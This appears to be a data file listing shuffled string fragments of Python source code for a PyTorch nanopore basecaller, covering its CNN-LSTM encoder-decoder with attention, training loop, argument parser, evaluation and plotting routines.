"them in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False),",
"acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings",
"checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2,",
"editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation:",
"color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i",
"edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on",
"notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val =",
"= args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention =",
"labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ###########################################",
"= n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if",
"60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()}",
"AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED",
"= last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches",
"model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in",
"patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr))",
"np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\"",
"where a and b both have shape (num_layers, batch_size, hidden_dim). # Sort instances",
"hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]],",
"input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val",
"v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())],",
"import argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from",
"2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs =",
"= np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len: if",
"> 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch,",
"Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] =",
"np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation",
"nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout',",
"1: not_padded_batches = i < true_y_len # get indices of not padded sequences",
"sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so",
"{} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration",
"labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for",
"layer # shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch,",
"the last element in the batch if i == max_in_batch: break # when",
"batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:,",
"\"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val =",
"WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"import torchvision import pickle import random import time import matplotlib.pyplot as plt import",
"dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val",
"%\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax = fig.add_subplot(1,",
"label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax =",
"length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred",
"optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience",
"help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+',",
"= torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) #",
"# SOS token = 1 [batch size, SOS token] for i in max_for:",
"param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2, n # ordering",
"end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end)",
"updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer,",
"puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update",
"Stop looping if we got to the last element in the batch if",
"-1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates",
"print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration",
"+ 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr:",
"input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda",
"hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim,",
"hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input,",
"= torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for =",
"random_value, mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target",
"plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for",
"requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val =",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\")",
"columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path +",
":] hidden = (h, c) label = y[not_padded_batches, :, i] # batch-i, features,",
"#### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx",
"\", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number",
"hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1,",
"def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1):",
"# batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax(",
"input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len:",
"= 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train =",
"make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to",
"[v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy",
"const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float,",
"Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers,",
"target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\",",
"# if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len)))",
"T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\"",
"train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) #",
"SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start,",
"# ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) #",
"the validation set val_losses = [] val_acc = [] val_editd = [] model.eval()",
"earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value,",
"reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not padded",
"in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0,",
"if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not in name:",
"torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate cross",
"TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE",
"Evaluation on the validation set val_losses = [] val_acc = [] val_editd =",
"i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied",
"x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y,",
"1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val /",
"will make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer,",
"const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network #",
"= bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers,",
"\"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path",
"plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD:",
"std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self,",
"float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val",
"help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000,",
"AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT",
"layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing",
"teacher_forcing_ratio >= 0.25: # if we have reached half of the updates teacher_forcing_ratio",
"# (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return",
"torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len, input_dim]",
"= hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden",
"DAMAGE. \"\"\" import h5py import numpy as np import os import sys import",
"type=int, default=1000, help=\"Make every n updates evaluation on the validation set\") # CNN",
"onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input",
"= torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch,",
"if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not",
"# LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers",
"int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds != None) and (updates",
"plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is not None:",
"label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) #",
"len y = y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs =",
"args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides",
"type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"old_ed = ed2 # epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2)",
"vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100",
"dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad)",
"[\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len)))",
"loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5]",
"input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__()",
"end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0)",
"dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention: # attention self.attn",
"* n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your",
"Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer",
"2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100",
"copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in",
"COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,",
"# else: # ed = 0 # ed2 = old_ed # # old_ed",
"############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True)",
"= 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" *",
"y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases:",
"in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" +",
"feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self,",
"n = param.size(0) # forget gate start, end = n//4, n//2 # ordering",
"self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn =",
"labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder #############################",
"performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train],",
"Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import",
"top1] = 1 # one hot encode input input_decoder = label if teacher_force",
"# * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size,",
"out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val,",
"#### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted,",
"loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser()",
"forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \", int((len(train_loader)",
"# sort labels so that they match with order in batch labels_sorted =",
"dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len =",
"epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref",
"end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b",
"nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear",
"torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length x input_size ####",
"list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases =",
"-1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h)",
"ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\")",
"#0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder",
"########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len,",
"class LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len, input_dim] def",
"torch.nn.functional as F import torchvision import pickle import random import time import matplotlib.pyplot",
"conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the",
"cross entropy loss # output = (seq*batch, out dim), target = (seq*batch) #",
"gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end],",
"pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn",
"= [] val_editd = [] model.eval() total_ed = 0 total_num_chars = 0 with",
"if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)),",
"descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens =",
"outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start",
"h, c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x",
"False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size",
"running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train",
"plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v",
"signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader",
"fname = args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs",
"lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def forward(self, inputs, seq_len,",
"= CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional",
"{}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5))",
"sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in",
"# ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size =",
"indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item()",
"out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value,",
"args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call",
"nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise our",
"i == max_in_batch: break # when seq length (i) >= true seq length",
"+ \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val",
"padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input,",
"val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(),",
"+ \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(),",
"#np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path",
"= args.call lr = args.learning_rate editD = args.editD sgd = False out_classes =",
"1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate)",
"open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length:",
"outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start self.end",
"self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x",
"= hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec =",
"n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate",
"dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:,",
"hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout)",
"plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"# attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2,",
"x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in",
"as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing",
"as next input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:,",
"1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self,",
"assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def",
"y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :]",
"= torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate",
"hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\")",
"(torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden()",
"i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len #",
"# unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx",
"or not teacher_force = random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size,",
"np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train,",
"\"\"\" import h5py import numpy as np import os import sys import torch",
"end], ord=2) # output gate start, end = n//2 + n//4, n input_biases[idx_b+3,",
"5: \"<PAD>\"} editd = 0 num_chars = 0 for idx, length in enumerate(target_lengths):",
"+= result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion,",
"in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256,",
"distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"",
"nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True)",
"= 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch",
"self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() #",
"plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf is not None:",
"infile = args.input fname = args.output port = args.gpu_port SEED = args.set_seed batch",
"3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\")",
"self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder",
